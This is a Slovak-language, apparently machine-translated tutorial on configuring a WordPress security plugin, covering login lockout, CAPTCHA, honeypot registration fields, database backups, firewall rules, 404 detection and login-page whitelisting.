Ak sem zadáte svoje heslo, doplnok zobrazí, ako dlho trvá hacknutie vašej stránky.
Odporúčania na zvýšenie sily hesla:

• Heslo musí byť alfanumerické
• Používajte malé a veľké písmená
• Nepoužívajte krátke heslá (minimálne 6 znakov)
• Je žiaduce mať v hesle špeciálne znaky (% # _ * @ $ a podrobné)

Zložitosť hesla

Autorizácia

Karta Blokovanie autorizácie

Nezabudnite zahrnúť. Ak do 5 minút niekto trikrát zadá nesprávne heslo, IP bude zablokovaná na 60 minút. Môžete dať viac, ale je lepšie to nerobiť. Môže sa stať, že aj vy sami zadáte nesprávne heslo a potom budete čakať mesiace alebo aj roky :)
Začiarknite políčko „Okamžite zablokovať neplatné používateľské mená“.
Povedzme, že vaše prihlasovacie meno je hozyainsayta, a ak niekto zadá iné prihlasovacie meno (napríklad prihlásenie), jeho IP adresa bude automaticky zablokovaná.

možnosti blokovania autorizácie

Automatické odhlásenie užívateľov

Začiarknite políčko. Ak prejdete na panel správcu stránky z iného počítača a zabudnete panel správcu opustiť, systém vás po určitom čase sám odhlási.
Dal som 1440 minút (to je 24 hodín).

Možnosti automatického odhlásenia používateľa

Registrácia používateľa

Manuálne potvrdenie

Kontrolujeme "Aktivovať manuálne schvaľovanie nových registrácií"

Manuálne schvaľovanie nových registrácií

CAPTCHA pri registrácii

Začiarknite aj políčko. Tým sa prerušia pokusy o registráciu robota, pretože roboty si nevedia poradiť s captchas.

Registrácia Honeypot

Oslavujeme. A nenechávame robotom ani jednu šancu. Toto nastavenie vytvorí ďalšie neviditeľné pole (napríklad Sem zadajte text). Toto pole je viditeľné iba pre roboty. Keďže automaticky vyplnia všetky polia, napíšu niečo aj do tohto poľa. Systém automaticky zablokuje tie pokusy o registráciu, pri ktorých bude toto pole vyplnené.

Ochrana databázy

predpona tabuľky DB

Ak vaša stránka existuje už dlho a je na nej veľa informácií, mali by ste zmeniť predponu databázy s maximálnou starostlivosťou.

nezabudnite zálohovať databázu

Ak ste práve vytvorili svoju stránku, môžete predponu bezpečne zmeniť.

Predpona databázovej tabuľky

Zálohovanie databázy

Zapneme automatické vytváranie záloh.
Vyberte frekvenciu zálohovania.
A počet súborov s týmito zálohami, ktoré sa majú uchovávať. Potom sa začnú prepisovať.
Ak chcete, aby boli tieto súbory dodatočne odoslané na váš e-mail, označíme príslušné políčko. Na tieto účely mám v schránke samostatný priečinok, tam sa posielajú všetky zálohy (moje a klientske stránky).

Nastavenia zálohovania databázy

Ochrana súborového systému

Tu zmeníme oprávnenia súboru tak, aby bolo všetko zelené.

Úprava php súborov

Dávame to v prípade, že neupravujete súbory cez admin panel. Vo všeobecnosti musíte vykonať akékoľvek zmeny v súboroch pomocou programov správcu ftp (napríklad filezilla). Takže v prípade akejkoľvek "zárubne" môžete vždy vrátiť späť predchádzajúcu akciu.

Zamietnutie prístupu. Touto akciou môžeme hackerom skryť dôležité informácie.

Čierna listina

Ak už máte adresy IP, ktorým chcete zakázať prístup na stránku, povoľte túto možnosť.

Blokovanie používateľov podľa IP

POŽARNE dvere

Základné pravidlá brány firewall.

Firewall a firewall je softvérový balík, ktorý filtruje neoprávnenú komunikáciu.

Tieto pravidlá sa zapisujú do súboru .htaccess, preto ho najskôr zálohujeme.

Teraz môžete začiarknuť potrebné políčka:

Aktivujte základné funkcie brány firewall
Ochrana pred zraniteľnosťou XMLRPC a WordPress Pingback
Zablokovať prístup k debug.log

Ďalšie pravidlá brány firewall

Na tejto karte začiarknite nasledujúce políčka:

• Zakázať prehliadanie adresárov
• Zakázať sledovanie HTTP
• Zakázať komentáre cez proxy
• Zakázať škodlivé reťazce v požiadavkách (môže narušiť funkčnosť iných doplnkov)
• Aktivujte dodatočné filtrovanie symbolov (Postupujeme tiež opatrne, musíme sa pozrieť na to, ako to ovplyvňuje výkon stránky)
  Každá položka má tlačidlo "+ Viac", kde si môžete prečítať podrobne o každej možnosti.

Pravidlá brány firewall na čiernu listinu 6G

Označíme oba body. Toto je kontrolovaný zoznam pravidiel, ktoré vám poskytuje bezpečnostný doplnok WordPress.

Nastavenia brány firewall (firewall).

Internetové roboty

Môžu sa vyskytnúť problémy s indexovaním stránky. Túto možnosť nepovoľujem.

Zabrániť horúcim odkazom

Začiarknite políčko. Aby sa obrázky z vašej stránky nezobrazovali na iných stránkach pomocou priameho odkazu. Táto funkcia znižuje zaťaženie servera.

Detekcia 404

Keď omylom zadáte adresu stránky, zobrazí sa chyba 404 (taká stránka neexistuje). Hackeri hrubou silou nachádzajú stránky so zraniteľnými miestami, a preto v krátkom čase zadávajú mnoho neexistujúcich adries URL.
Takéto pokusy o hackovanie budú zaznamenané v tabuľke na tejto stránke a zaškrtnutím políčka môžete zablokovať ich IP adresy na určený čas.

Nastavenia sledovania chýb 404

Ochrana proti útokom hrubou silou

V predvolenom nastavení majú všetky stránky na WordPress rovnakú adresu autorizačnej stránky. A preto útočníci presne vedia, kde začať hackovať stránku.
Táto možnosť vám umožňuje zmeniť adresu tejto stránky. Toto je veľmi dobrá ochrana pre stránku wordpress. Adresu určite zmeníme. Toto políčko som nezaškrtol, pretože ten môj mi túto stránku automaticky zmenil pri inštalácii systému.

Ochrana proti útokom hrubou silou pomocou cookies

Toto nastavenie som nepovolil, pretože existuje možnosť blokovania pri prihlasovaní z rôznych zariadení.

Prihláste sa CAPTCHA

Ak má vaša stránka veľa používateľov alebo máte internetový obchod, môžete povoliť Captcha pri prihlasovaní na všetkých miestach.

Ochrana captcha počas autorizácie

Prihlásenie na whitelist

Chodíte na admin panel iba z domáceho počítača a ste jediným používateľom svojej stránky? Potom zadajte svoju IP adresu a všetkým ostatným bude zamietnutý prístup na autorizačnú stránku.